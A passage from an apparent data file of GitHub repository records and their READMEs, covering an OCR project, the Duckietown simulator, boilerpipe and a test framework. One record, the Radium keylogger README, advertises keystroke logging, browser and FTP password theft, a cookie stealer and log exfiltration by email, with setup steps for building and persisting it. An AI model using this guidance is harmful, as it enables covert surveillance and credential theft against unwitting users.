PYTHONPATH=$PYTHONPATH:./\n```\n\nRun inference demo:\n\n```bash\npython3 tools/inference_crnn_ctc.py \\\n --image_dir ./test_data/images/ --image_list ./test_data/image_list.txt \\\n --model_dir /path/to/your/bs_synth90k_model/ 2>/dev/null\n```\n\nResult is:\n```\nPredict 1_AFTERSHAVE_1509.jpg image as: aftershave\n```\n![1_AFTERSHAVE_1509.jpg](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/test_data/images/1_AFTERSHAVE_1509.jpg)\n```\nPredict 2_LARIAT_43420.jpg image as: lariat\n```\n![2_LARIAT_43420](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/test_data/images/2_LARIAT_43420.jpg)\n\n# Train a new model\n\n### Data Preparation\n* Firstly you need download [Synth90k](http://www.robots.ox.ac.uk/~vgg/data/text/) datasets and extract it into a folder. \n\n* Secondly supply a txt file to specify the relative path to the image data dir and it's corresponding text label. \n\nFor example: image_list.txt\n```bash\n90kDICT32px/1/2/373_coley_14845.jpg coley\n90kDICT32px/17/5/176_Nevadans_51437.jpg nevadans\n```\n* Then you suppose to convert your dataset to tfrecord format can be done by\n```bash\npython3 tools/create_crnn_ctc_tfrecord.py \\\n --image_dir path/to/90kDICT32px/ --anno_file path/to/image_list.txt --data_dir ./tfrecords/ \\\n --validation_split_fraction 0.1\n```\nNote: make sure that images can be read from the path you specificed. For example:\n```bash\npath/to/90kDICT32px/1/2/373_coley_14845.jpg\npath/to/90kDICT32px/17/5/176_Nevadans_51437.jpg\n.......\n```\nAll training images will be scaled into height 32pix and write to tfrecord file. 
\nThe dataset will be divided into train and validation set and you can change the parameter to control the ratio of them.\n\n#### Otherwise you can use the dowload_synth90k_and_create_tfrecord.sh script automatically create tfrecord:\n```\ncd ./data\nsh dowload_synth90k_and_create_tfrecord.sh\n```\n\n### Train model\n```bash\npython3 tools/train_crnn_ctc.py --data_dir ./tfrecords/ --model_dir ./model/ --batch_size 32\n```\nAfter several times of iteration you can check the output in terminal as follow: \n\n![](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/data/20180919022202.png?raw=true)\n\nDuring my experiment the loss drops as follow:\n![](https://github.com/bai-shang/crnn_ctc_ocr_tf/blob/master/data/20180919202432.png?raw=true)\n\n### Evaluate model\n```bash\npython3 tools/eval_crnn_ctc.py --data_dir ./tfrecords/ --model_dir ./model/ 2>/dev/null\n```\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "duckietown/gym-duckietown", "link": "https://github.com/duckietown/gym-duckietown", "tags": ["openai-gym", "simulator", "reinforcement-learning", "robot", "imitation-learning"], "stars": 513, "description": "Self-driving car simulator for the Duckietown universe", "lang": "Python", "repo_lang": "", "readme": "# Gym-Duckietown\n\n[![Build Status](https://circleci.com/gh/duckietown/gym-duckietown/tree/master.svg?style=shield)](https://circleci.com/gh/duckietown/gym-duckietown/tree/master) [![Docker Hub](https://img.shields.io/docker/pulls/duckietown/gym-duckietown.svg)](https://hub.docker.com/r/duckietown/gym-duckietown)\n\n\n[Duckietown](http://duckietown.org/) self-driving car simulator environments for OpenAI Gym.\n\nPlease use this bibtex if you want to cite this repository in your publications:\n\n```\n@misc{gym_duckietown,\n author = {Chevalier-Boisvert, Maxime and Golemo, Florian and Cao, Yanjun and Mehta, Bhairav and Paull, Liam},\n title = {Duckietown Environments for OpenAI Gym},\n year = {2018},\n publisher = {GitHub},\n journal = {GitHub repository},\n howpublished = {\\url{https://github.com/duckietown/gym-duckietown}},\n}\n```\n\nThis simulator was created as part of work done at [Mila](https://mila.quebec/).\n\n

\n*(Image: Welcome to Duckietown!)*\n

\n\n## Introduction\n\nGym-Duckietown is a simulator for the [Duckietown](https://duckietown.org) Universe, written in pure Python/OpenGL (Pyglet). It places your agent, a Duckiebot, inside of an instance of a Duckietown: a loop of roads with turns, intersections, obstacles, Duckie pedestrians, and other Duckiebots. It can be a pretty hectic place!\n\nGym-Duckietown is fast, open, and incredibly customizable. What started as a lane-following simulator has evolved into a fully-functioning autonomous driving simulator that you can use to train and test your Machine Learning, Reinforcement Learning, Imitation Learning, or even classical robotics algorithms. Gym-Duckietown offers a wide range of tasks, from simple lane-following to full city navigation with dynamic obstacles. Gym-Duckietown also ships with features, wrappers, and tools that can help you bring your algorithms to the real robot, including [domain-randomization](https://blog.openai.com/spam-detection-in-the-physical-world/), accurate camera distortion, and differential-drive physics (and most importantly, realistic waddling).\n\n


\n\nThere are multiple registered gym environments, each corresponding to a different [map file](https://github.com/duckietown/gym-duckietown/tree/master/gym_duckietown/maps):\n- `Duckietown-straight_road-v0`\n- `Duckietown-4way-v0`\n- `Duckietown-udem1-v0`\n- `Duckietown-small_loop-v0`\n- `Duckietown-small_loop_cw-v0`\n- `Duckietown-zigzag_dists-v0`\n- `Duckietown-loop_obstacles-v0` (static obstacles in the road)\n- `Duckietown-loop_pedestrians-v0` (moving obstacles in the road)\n\nThe `MultiMap-v0` environment is essentially a [wrapper](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/envs/multimap_env.py) for the simulator which\nwill automatically cycle through all available [map files](https://github.com/duckietown/gym-duckietown/tree/master/gym_duckietown/maps). This makes it possible to train on\na variety of different maps at the same time, with the idea that training on a variety of\ndifferent scenarios will make for a more robust policy/model.\n\n`gym-duckietown` is an _accompanying_ simulator to real Duckiebots, which allow you to run your code on the real robot. We provide a domain randomization API, which can help you transfer your trained policies from simulation to real world. Without using a domain transfer method, your learned models will likely overfit to various aspects of the simulator, which won't transfer to the real world. When you deploy, you and your Duckiebot will be running around in circles trying to figure out what's going on.\n\n
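As a quick orientation, a minimal interaction loop with one of these registered environments might look like the sketch below. It is illustrative only: it assumes that importing `gym_duckietown` registers the environment IDs listed above, and the exact `reset`/`step` return values depend on your gym version; the action and observation conventions are described in the Design section further down.

```python
# Illustrative sketch: manually stepping a registered Duckietown environment.
import gym
import numpy as np

import gym_duckietown  # noqa: F401  # assumed to register the Duckietown-* env IDs

env = gym.make('Duckietown-small_loop-v0')
obs = env.reset()
print(obs.shape)  # camera image, (120, 160, 3) uint8 per the Observations section

for _ in range(200):
    # Continuous action: [forward velocity, steering angle], both in [-1, 1]
    action = np.array([0.3, 0.0])
    obs, reward, done, info = env.step(action)
    if done:
        obs = env.reset()
env.close()
```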


\n\nThe `Duckiebot-v0` environment is meant to connect to software running on\na real Duckiebot and remotely control the robot. It is a tool to test that policies\ntrained in simulation can transfer to the real robot. If you want to\ncontrol your robot remotely with the `Duckiebot-v0` environment, you will need to\ninstall the software found in the [duck-remote-iface](https://github.com/maximecb/duck-remote-iface)\nrepository on your Duckiebot.\n\n
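Conceptually, the same evaluation loop can then target either the simulator or the real robot by switching the environment ID. The sketch below is illustrative only and omits the `Duckiebot-v0` connection details (robot address, etc.), which depend on your duck-remote-iface setup:

```python
# Illustrative sketch: the same policy-evaluation code pointed at either target.
import gym

import gym_duckietown  # noqa: F401  # assumed to register the environment IDs


def evaluate(env_id, policy, episodes=3):
    env = gym.make(env_id)
    for _ in range(episodes):
        obs, done = env.reset(), False
        while not done:
            obs, reward, done, info = env.step(policy(obs))
    env.close()

# my_policy is a placeholder for your own observation -> action function:
# evaluate('Duckietown-udem1-v0', my_policy)  # in simulation
# evaluate('Duckiebot-v0', my_policy)         # on the real robot via duck-remote-iface
```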

\n*(Image: Duckiebot-v0)*\n

\n\n## Installation\n\nRequirements:\n- Python 3.6+\n- OpenAI gym\n- NumPy\n- Pyglet\n- PyYAML\n- PyTorch\n\nYou can install all the dependencies except PyTorch with `pip3`:\n\n```\ngit clone https://github.com/duckietown/gym-duckietown.git\ncd gym-duckietown\npip3 install -e .\n```\n\nReinforcement learning code forked from [this repository](https://github.com/ikostrikov/pytorch-a2c-ppo-acktr)\nis included under [/pytorch_rl](/pytorch_rl). If you wish to use this code, you\nshould install [PyTorch](http://pytorch.org/).\n\n### Installation Using Conda (Alternative Method)\n\nAlternatively, you can install all the dependencies, including PyTorch, using Conda as follows. For those trying to use this package on MILA machines, this is the way to go:\n\n```\ngit clone https://github.com/duckietown/gym-duckietown.git\ncd gym-duckietown\nconda env create -f environment.yaml\n```\n\nPlease note that if you use Conda to install this package instead of pip, you will need to activate your Conda environment and add the package to your Python path before you can use it:\n\n```\nsource activate gym-duckietown\nexport PYTHONPATH=\"${PYTHONPATH}:`pwd`\"\n```\n\n### Docker Image\n\nThere is a pre-built Docker image available [on Docker Hub](https://hub.docker.com/r/duckietown/gym-duckietown), which also contains an installation of PyTorch.\n\n*Note that in order to get GPU acceleration, you should install and use [nvidia-docker 2.0](https://github.com/nvidia/nvidia-docker/wiki/Installation-(version-2.0)).*\n\nTo get started, pull the `duckietown/gym-duckietown` image from Docker Hub and open a shell in the container:\n\n```\nnvidia-docker pull duckietown/gym-duckietown && \\\nnvidia-docker run -it duckietown/gym-duckietown bash\n```\n\nThen create a virtual display:\n\n```\nXvfb :0 -screen 0 1024x768x24 -ac +extension GLX +render -noreset &> xvfb.log &\nexport DISPLAY=:0\n```\n\nNow, you are ready to start training a policy using RL:\n\n```\npython3 pytorch_rl/main.py \\\n --algo a2c \\\n --env-name Duckietown-loop_obstacles-v0 \\\n --lr 0.0002 \\\n --max-grad-norm 0.5 \\\n --no-vis \\\n --num-steps 20\n```\n\nIf you need to do so, you can build a Docker image by running the following command from the root directory of this repository:\n\n```\ndocker build . \\\n --file ./docker/standalone/Dockerfile \\\n --no-cache=true \\\n --network=host \\\n --tag \n```\n\n## Usage\n\n### Testing\n\nThere is a simple UI application which allows you to control the simulation or real robot manually. The `manual_control.py` application will launch the Gym environment, display camera images and send actions (keyboard commands) back to the simulator or robot. You can specify which map file to load with the `--map-name` argument:\n\n```\n./manual_control.py --env-name Duckietown-udem1-v0\n```\n\nThere is also a script to run automated tests (`run_tests.py`) and a script to gather performance metrics (`benchmark.py`).\n\n### Reinforcement Learning\n\nTo train a reinforcement learning agent, you can use the code provided under [/pytorch_rl](/pytorch_rl). I recommend using the A2C or ACKTR algorithms. A sample command to launch training is:\n\n```\npython3 pytorch_rl/main.py --no-vis --env-name Duckietown-small_loop-v0 --algo a2c --lr 0.0002 --max-grad-norm 0.5 --num-steps 20\n```\n\nThen, to visualize the results of training, you can run the following command. Note that you can do this while the training process is still running. 
Also note that if you are running this through SSH, you will need to enable X forwarding to get a display:\n\n```\npython3 pytorch_rl/enjoy.py --env-name Duckietown-small_loop-v0 --num-stack 1 --load-dir trained_models/a2c\n```\n\n### Imitation Learning\n\nThere is a script in the `experiments` directory which automatically generates a dataset of synthetic demonstrations. It uses hillclimbing to optimize the reward obtained, and outputs a JSON file:\n\n```\nexperiments/gen_demos.py --map-name loop_obstacles\n```\n\nThen you can start training an imitation learning model (conv net) with:\n\n```\nexperiments/train_imitation.py --map-name loop_obstacles\n```\n\nFinally, you can visualize what the trained model is doing with:\n\n```\nexperiments/control_imitation.py --map-name loop_obstacles\n```\n\nNote that it is possible to have `gen_demos.py` and `train_imitate.py` running simultaneously, so that training takes place while new demonstrations are being generated. You can also run `control_imitate.py` periodically during training to check on learning progress.\n\n## Design\n\n### Map File Format\n\nThe simulator supports a YAML-based file format which is designed to be easy to hand edit. See the [maps subdirectory](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/maps) for examples. Each map file has two main sections: a two-dimensional array of tiles, and a listing of objects to be placed around the map. The tiles are based on the [Duckietown appearance specification](https://docs.duckietown.org/daffy/opmanual_duckietown/out/duckietown_specs.html).\n\nThe available tile types are:\n- empty\n- straight\n- curve_left\n- curve_right\n- 3way_left (3-way intersection)\n- 3way_right\n- 4way (4-way intersection)\n- asphalt\n- grass\n- floor (office floor)\n\nThe available object types are:\n- barrier\n- cone (traffic cone)\n- duckie\n- duckiebot (model of a Duckietown robot)\n- tree\n- house\n- truck (delivery-style truck)\n- bus\n- building (multi-floor building)\n- sign_stop, sign_T_intersect, sign_yield, etc. (see [meshes subdirectory](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/meshes))\n\nAlthough the environment is rendered in 3D, the map is essentially two-dimensional. As such, objects coordinates are specified along two axes. The coordinates are rescaled based on the tile size, such that coordinates [0.5, 1.5] would mean middle of the first column of tiles, middle of the second row. Objects can have an `optional` flag set, which means that they randomly may or may not appear during training, as a form of domain randomization.\n\n### Observations\n\nThe observations are single camera images, as numpy arrays of size (120, 160, 3). These arrays contain unsigned 8-bit integer values in the [0, 255] range.\nThis image size was chosen because it is exactly one quarter of the 640x480 image resolution provided by the camera, which makes it fast and easy to scale down\nthe images. The choice of 8-bit integer values over floating-point values was made because the resulting images are smaller if stored on disk and faster to send over a networked connection.\n\n### Actions\n\nThe simulator uses continuous actions by default. Actions passed to the `step()` function should be numpy arrays containining two numbers between -1 and 1. These two numbers correspond to forward velocity, and a steering angle, respectively. A positive velocity makes the robot go forward, and a positive steering angle makes the robot turn left. 
There is also a [Gym wrapper class](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/wrappers.py) named `DiscreteWrapper` which allows you to use discrete actions (turn left, move forward, turn right) instead of continuous actions if you prefer.\n\n### Reward Function\n\nThe default reward function tries to encourage the agent to drive forward along the right lane in each tile. Each tile has an associated Bezier curve defining the path the agent is expected to follow. The agent is rewarded for being as close to the curve as possible, and also for facing the same direction as the curve's tangent. The episode is terminated if the agent gets too far outside of a drivable tile, or if the `max_steps` parameter is exceeded. See the `step` function in [this source file](https://github.com/duckietown/gym-duckietown/blob/master/gym_duckietown/envs/simplesim_env.py).\n\n## Troubleshooting\n\nIf you run into problems of any kind, don't hesitate to [open an issue](https://github.com/duckietown/gym-duckietown/issues) on this repository. It's quite possible that you've run into some bug we aren't aware of. Please make sure to give some details about your system configuration (i.e. PC or Mac, operating system), and to paste the command you used to run the simulator, as well as the complete error message that was produced, if any.\n\n### ImportError: Library \"GLU\" not found\n\nYou may need to manually install packages needed by Pyglet or OpenAI Gym on your system. The command you need to use will vary depending on which OS you are running. For example, to install the glut package on Ubuntu:\n\n```\nsudo apt-get install freeglut3-dev\n```\n\nAnd on Fedora:\n\n```\nsudo dnf install freeglut-devel\n```\n\n### NoSuchDisplayException: Cannot connect to \"None\"\n\nIf you are connected through SSH, or running the simulator in a Docker image, you will need to use xvfb to create a virtual display in order to run the simulator. See the \"Running Headless\" subsection below.\n\n### Running headless\n\nThe simulator uses the OpenGL API to produce graphics. This requires an X11 display to be running, which can be problematic if you are trying to run training code over SSH, or on a cluster. You can create a virtual display using [Xvfb](https://en.wikipedia.org/wiki/Xvfb). The instructions shown below illustrate this. 
Note, however, that these instructions are specific to MILA, look further down for instructions on an Ubuntu box:\n\n```\n# Reserve a Debian 9 machine with 12GB ram, 2 cores and a GPU on the cluster\nsinter --reservation=res_stretch --mem=12000 -c2 --gres=gpu\n\n# Activate the gym-duckietown Conda environment\nsource activate gym-duckietown\n\ncd gym-duckietown\n\n# Add the gym_duckietown package to your Python path\nexport PYTHONPATH=\"${PYTHONPATH}:`pwd`\"\n\n# Load the GLX library\n# This has to be done before starting Xvfb\nexport LD_LIBRARY_PATH=/Tmp/glx:$LD_LIBRARY_PATH\n\n# Create a virtual display with OpenGL support\nXvfb :$SLURM_JOB_ID -screen 0 1024x768x24 -ac +extension GLX +render -noreset &> xvfb.log &\nexport DISPLAY=:$SLURM_JOB_ID\n\n# You are now ready to train\n```\n\n### Running headless and training in a cloud based environment (AWS)\n\nWe recommend using the Ubuntu-based [Deep Learning AMI](https://aws.amazon.com/marketplace/pp/B077GCH38C) to provision your server which comes with all the deep learning libraries.\n\n```\n# Install xvfb\nsudo apt-get install xvfb mesa-utils -y\n\n# Remove the nvidia display drivers (this doesn't remove the CUDA drivers)\n# This is necessary as nvidia display doesn't play well with xvfb\nsudo nvidia-uninstall -y\n\n# Sanity check to make sure you still have CUDA driver and its version\nnvcc --version\n\n# Start xvfb\nXvfb :1 -screen 0 1024x768x24 -ac +extension GLX +render -noreset &> xvfb.log &\n\n# Export your display id\nexport DISPLAY=:1\n\n# Check if your display settings are valid\nglxinfo\n\n# You are now ready to train\n```\n\n### Poor performance, low frame rate\n\nIt's possible to improve the performance of the simulator by disabling Pyglet error-checking code. Export this environment variable before running the simulator:\n\n```\nexport PYGLET_DEBUG_GL=True\n```\n\n### RL training doesn't converge\n\nReinforcement learning algorithms are extremely sensitive to hyperparameters. Choosing the\nwrong set of parameters could prevent convergence completely, or lead to unstable performance over\ntraining. You will likely want to experiment. A learning rate that is too low can lead to no\nlearning happening. A learning rate that is too high can lead unstable performance throughout\ntraining or a suboptimal result.\n\nThe reward values are currently rescaled into the [0,1] range, because the RL code in\n`pytorch_rl` doesn't do reward clipping, and deals poorly with large reward values. Also\nnote that changing the reward function might mean you also have to retune your choice\nof hyperparameters.\n\n### Unknown encoder 'libx264' when using gym.wrappers.Monitor\n\nIt is possible to use `gym.wrappers.Monitor` to record videos of the agent performing a task. See [examples here](https://www.programcreek.com/python/example/100947/gym.wrappers.Monitor).\n\nThe libx264 error is due to a problem with the way ffmpeg is installed on some linux distributions. 
One possible way to circumvent this is to reinstall ffmpeg using conda:\n\n```\nconda install -c conda-forge ffmpeg\n```\n\nAlternatively, screencasting programs such as [Kazam](https://launchpad.net/kazam) can be used to record the graphical output of a single window.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "mehulj94/Radium", "link": "https://github.com/mehulj94/Radium", "tags": ["python", "keylogger", "security"], "stars": 513, "description": "Python logger with multiple features.", "lang": "Python", "repo_lang": "", "readme": "```\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n _____ _ _ _ _\n | __ \\ | (_) | | | |\n | |__) |__ _ __| |_ _ _ _ __ ___ | | _____ _ _| | ___ __ _ __ _ ___ _ __\n | _ // _` |/ _` | | | | | '_ ` _ \\ | |/ / _ \\ | | | |/ _ \\ / _` |/ _` |/ _ \\ '__|\n | | \\ \\ (_| | (_| | | |_| | | | | | | | < __/ |_| | | (_) | (_| | (_| | __/ |\n |_| \\_\\__,_|\\__,_|_|\\__,_|_| |_| |_| |_|\\_\\___|\\__, |_|\\___/ \\__, |\\__, |\\___|_|\n __/ | __/ | __/ |\n |___/ |___/ |___/\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n\n--> Coded by: Mehul Jain\n--> For windows only\n\n____ ____ ____ ____ ____ ____ ____\n ______ _\n | ____| | |\n | |__ ___ __ _| |_ _ _ _ __ ___ ___\n | __/ _ \\/ _` | __| | | | '__/ _ \\/ __|\n | | | __/ (_| | |_| |_| | | | __/\\__ \\\n |_| \\___|\\__,_|\\__|\\__,_|_| \\___||___/\n____ ____ ____ ____ ____ ____ ____\n\n--> Applications and keystrokes logging\n--> Screenshot logging\n--> Drive tree structure\n--> Logs sending by email\n--> Password Recovery for\n \u2022 Chrome\n \u2022 Mozilla\n \u2022 Filezilla\n \u2022 Core FTP\n \u2022 CyberDuck\n \u2022 FTPNavigator\n \u2022 WinSCP\n \u2022 Outlook\n \u2022 Putty\n \u2022 Skype\n \u2022 Generic Network\n--> Cookie stealer\n--> Keylogger stub update mechanism\n--> Gather system information\n \u2022 Internal and External IP\n \u2022 Ipconfig /all output\n \u2022 Platform\n____ ____ ____ ____ ____\n _ _ _____ ___ _____ _____\n| | | / ___|/ _ \\| __ \\| ___|\n| | | \\ `--./ /_\\ \\ | \\/| |__\n| | | |`--. \\ _ | | __ | __|\n| |_| /\\__/ / | | | |_\\ \\| |___\n \\___/\\____/\\_| |_/\\____/\\____/\n____ ____ ____ ____ ____\n\n--> Download the libraries if you are missing any.\n--> Set the Gmail username and password and remember to check allow connection from less secure apps in gmail settings.\n--> Set the FTP server. Make the folder Radium in which you'll store the new version of exe.\n--> Set the FTP ip, username, password.\n--> Remember to encode the password in base64.\n--> Set the originalfilename variable in copytostartup(). This should be equal to the name of the exe.\n--> Make the exe using Pyinstaller\n--> Keylogs will be mailed after every 300 key strokes. This can be changed.\n--> Screenshot is taken after every 500 key strokes. 
This can be changed.\n--> Remember: If you make this into exe, change the variable \"originalfilename\" and \"coppiedfilename\" in function copytostartup().\n--> Remember: whatever name you give to \"coppiedfilename\", should be given to checkfilename in deleteoldstub().\n\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n _____ _ _ _ _\n|_ _| | (_) | | | |\n | | | |__ _ _ __ __ _ ___ | |_ ___ __ _____ _ __| | __ ___ _ __\n | | | '_ \\| | '_ \\ / _` / __| | __/ _ \\ \\ \\ /\\ / / _ \\| '__| |/ / / _ \\| '_ \\\n | | | | | | | | | | (_| \\__ \\ | || (_) | \\ V V / (_) | | | < | (_) | | | |\n \\_/ |_| |_|_|_| |_|\\__, |___/ \\__\\___/ \\_/\\_/ \\___/|_| |_|\\_\\ \\___/|_| |_|\n __/ |\n |___/\n____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____\n\n--> Persistance\n--> Taking screenshots after a specific time. Making it keystrokes independent.\n--> Webcam logging\n--> Skype chat history stealer\n--> Steam credential harvestor\n```\n# Requirements\n* Install [PyHook](https://sourceforge.net/projects/pyhook/)\n* Install [PyWin32](https://sourceforge.net/projects/pywin32/)\n* Install [Microsoft Visual C++ Compiler for Python](https://www.microsoft.com/en-us/download/details.aspx?id=44266)\n* Install [PyInstaller](http://www.pyinstaller.org/)\n\n# Tutorial\n[![Tutorial Radium Keylogger](https://i.imgur.com/Y1jE9Km.png)](https://youtu.be/T0h_427L8u4)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "j2labs/brubeck", "link": "https://github.com/j2labs/brubeck", "tags": [], "stars": 513, "description": "Asynchronous web and messaging", "lang": "Python", "repo_lang": "", "readme": "# What Is Brubeck?\n\n__Brubeck__ is no longer actively maintained.\n", "readme_type": "markdown", "hn_comments": "As somebody who's been quite happily building a system around Brubeck for the better part of two months now, it's nice to see the background story pieced together into a cogent storyline.What's more interesting, I think, is the insight into the thought process and background that goes into building something that is exquisitely elegant in its simplicity and at the same time incredibly powerful and flexible.Working with Brubeck has been a delight since the very beginning. 
Granted I've had experience building MVC type systems before, including in Python, but I think Brubeck's ease-of-use is quite significant compared to other frameworks.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "misja/python-boilerpipe", "link": "https://github.com/misja/python-boilerpipe", "tags": [], "stars": 513, "description": "Python interface to Boilerpipe, Boilerplate Removal and Fulltext Extraction from HTML pages", "lang": "Python", "repo_lang": "", "readme": "# python-boilerpipe\n\n\nA python wrapper for [Boilerpipe](http://code.google.com/p/boilerpipe/), an excellent Java library for boilerplate removal and fulltext extraction from HTML pages.\n\n## Configuration\n\n\nDependencies:\n\n * jpype\n * chardet\n\nThe boilerpipe jar files will get fetched and included automatically when building the package.\n\n## Installation\n\nCheckout the code:\n\n\tgit clone https://github.com/misja/python-boilerpipe.git\n\tcd python-boilerpipe\n\n\n**virtualenv**\n\n\tvirtualenv env\n\tsource env/bin/activate\n pip install -r requirements.txt\n\tpython setup.py install\n\t\n\n**Fedora**\n\n sudo dnf install -y python2-jpype\n sudo python setup.py install\n\n\n## Usage\n\n\nBe sure to have set `JAVA_HOME` properly since `jpype` depends on this setting.\n\nThe constructor takes a keyword argument `extractor`, being one of the available boilerpipe extractor types:\n\n - DefaultExtractor\n - ArticleExtractor\n - ArticleSentencesExtractor\n - KeepEverythingExtractor\n - KeepEverythingWithMinKWordsExtractor\n - LargestContentExtractor\n - NumWordsRulesExtractor\n - CanolaExtractor\n\nIf no extractor is passed the DefaultExtractor will be used by default. Additional keyword arguments are either `html` for HTML text or `url`.\n\n from boilerpipe.extract import Extractor\n extractor = Extractor(extractor='ArticleExtractor', url=your_url)\n\nThen, to extract relevant content:\n\n extracted_text = extractor.getText()\n\n extracted_html = extractor.getHTML()\n\n\nFor `KeepEverythingWithMinKWordsExtractor` we have to specify `kMin` parameter, which defaults to `1` for now:\n\n\textractor = Extractor(extractor='KeepEverythingWithMinKWordsExtractor', url=your_url, kMin=20)\n\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "yanchunhuo/AutomationTest", "link": "https://github.com/yanchunhuo/AutomationTest", "tags": ["automated-testing", "selenium", "appium", "autotesting", "dubbo"], "stars": 514, "description": "\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6\uff0c\u652f\u6301\u63a5\u53e3\u81ea\u52a8\u5316\u3001WEB UI\u81ea\u52a8\u5316\u3001APP UI\u81ea\u52a8\u5316\u3001\u6027\u80fd\u6d4b\u8bd5\uff1b\u652f\u6301\u591a\u7cfb\u7edf\u76f8\u4e92\u8c03\u7528\uff1b\u652f\u6301\u63a5\u53e3\u4e0eUI\u76f8\u4e92\u8c03\u7528\uff1b\u652f\u6301dubbo\u63a5\u53e3\u8c03\u7528", "lang": "Python", "repo_lang": "", "readme": "![avatar](https://github.com/yanchunhuo/resources/blob/master/APIAutomationTest/report.png)\n\n# [\u81ea\u52a8\u5316\u6d4b\u8bd5]()\n\n# [\u6982\u51b5]()\n* \u672c\u9879\u76ee\u652f\u6301\u63a5\u53e3\u81ea\u52a8\u5316\u6d4b\u8bd5\u3001app ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u3001web ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u3001\u6027\u80fd\u6d4b\u8bd5\n* \u672c\u9879\u76ee\u7531\u4ee5\u4e0b\u5de5\u5177\u7ec4\u6210\n * pytest\uff1apython\u7684\u4e00\u4e2a\u5355\u5143\u6d4b\u8bd5\u6846\u67b6,https://docs.pytest.org/en/latest/\n * 
pytest-xdist\uff1apytest\u7684\u4e00\u4e2a\u63d2\u4ef6,\u53ef\u591a\u8fdb\u7a0b\u540c\u65f6\u6267\u884c\u6d4b\u8bd5\u7528\u4f8b,https://github.com/pytest-dev/pytest-xdist\n * allure-pytest\uff1a\u7528\u4e8e\u751f\u6210\u6d4b\u8bd5\u62a5\u544a,http://allure.qatools.ru/\n * PyHamcrest\uff1a\u4e00\u4e2a\u5339\u914d\u5668\u5bf9\u8c61\u7684\u6846\u67b6\uff0c\u7528\u4e8e\u65ad\u8a00\uff0chttps://github.com/hamcrest/PyHamcrest\n * requests\uff1ahttp\u8bf7\u6c42\u6846\u67b6,http://docs.python-requests.org/en/master/\n * Appium\uff1a\u79fb\u52a8\u7aef\u7684\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6,https://github.com/appium/appium/tree/v1.15.1\n * selenium\uff1aweb ui\u81ea\u52a8\u5316\u6d4b\u8bd5\u6846\u67b6,https://www.seleniumhq.org/\n * cx_Oracle\uff1aoracle\u64cd\u4f5c\u5e93,https://cx-oracle.readthedocs.io/en/latest/index.html\n * JPype1\uff1a\u7528\u4e8e\u6267\u884cjava\u4ee3\u7801,https://github.com/jpype-project/jpype\n * paramiko\uff1assh\u5ba2\u6237\u7aef,https://docs.paramiko.org/en/stable/\n * Pillow\uff1a\u7528\u4e8e\u56fe\u7247\u5904\u7406,https://pillow.readthedocs.io/en/latest/\n * PyMySQL\uff1a\u7528\u4e8e\u64cd\u4f5cMySQL\u6570\u636e\u5e93,https://github.com/PyMySQL/PyMySQL\n * redis\uff1aredis\u5ba2\u6237\u7aef,https://pypi.org/project/redis/\n * tess4j\uff1ajava\u7684\u56fe\u7247\u8bc6\u522b\u5de5\u5177,https://github.com/nguyenq/tess4j/\n * allpairspy: \u7528\u4e8e\u5c06\u53c2\u6570\u5217\u8868\u8fdb\u884c\u6b63\u4ea4\u5206\u6790\uff0c\u5b9e\u73b0\u6b63\u4ea4\u5206\u6790\u6cd5\u7528\u4f8b\u8986\u76d6\uff0chttps://pypi.org/project/allpairspy/\n * python-binary-memcached\uff1a\u7528\u4e8e\u64cd\u4f5cmemcached\uff0chttps://github.com/jaysonsantos/python-binary-memcached\n * kazoo\uff1a\u7528\u4e8e\u64cd\u4f5czookeeper\uff0chttps://github.com/python-zk/kazoo\n * websockets\uff1a\u7528\u4e8ewebsocket\u8bf7\u6c42\uff0chttps://github.com/aaugustin/websockets\n * Js2Py\uff1a\u7528\u4e8e\u6267\u884cjs\u4ee3\u7801\uff0chttps://github.com/PiotrDabkowski/Js2Py\n * sqlacodegen\uff1a\u7528\u4e8e\u6839\u636e\u6570\u636e\u5e93\u8868\u7ed3\u6784\u751f\u6210python\u5bf9\u8c61\uff0chttps://github.com/agronholm/sqlacodegen\n * SQLAlchemy\uff1aSQL\u5de5\u5177\u5305\u53ca\u5bf9\u8c61\u5173\u7cfb\u6620\u5c04\uff08ORM\uff09\u5de5\u5177\uff0chttps://github.com/sqlalchemy/sqlalchemy\n* \u5f53\u524d\u4ec5\u652f\u6301Python>=3.6\n* \u9879\u76ee\u5982\u9700\u6267\u884cjava\u4ee3\u7801(\u5373\u4f7f\u7528jpype1)\uff0c\u5219\u9879\u76ee\u76ee\u5f55\u6240\u5728\u7684\u8def\u5f84\u4e0d\u53ef\u5305\u542b\u4e2d\u6587\n \n# [\u4f7f\u7528]()\n## \u4e00\u3001\u73af\u5883\u51c6\u5907\n### 1\u3001\u811a\u672c\u8fd0\u884c\u73af\u5883\u51c6\u5907\n#### 1.1\u3001\u5b89\u88c5\u7cfb\u7edf\u4f9d\u8d56\n* Linux-Ubuntu:\n * apt-get install libpq-dev python3-dev \u3010\u7528\u4e8epsycopg2-binary\u6240\u9700\u4f9d\u8d56\u3011\n * apt-get install g++ libgraphicsmagick++1-dev libboost-python-dev \u3010\u7528\u4e8epgmagick\u6240\u9700\u4f9d\u8d56\u3011\n * apt-get install python-pgmagick 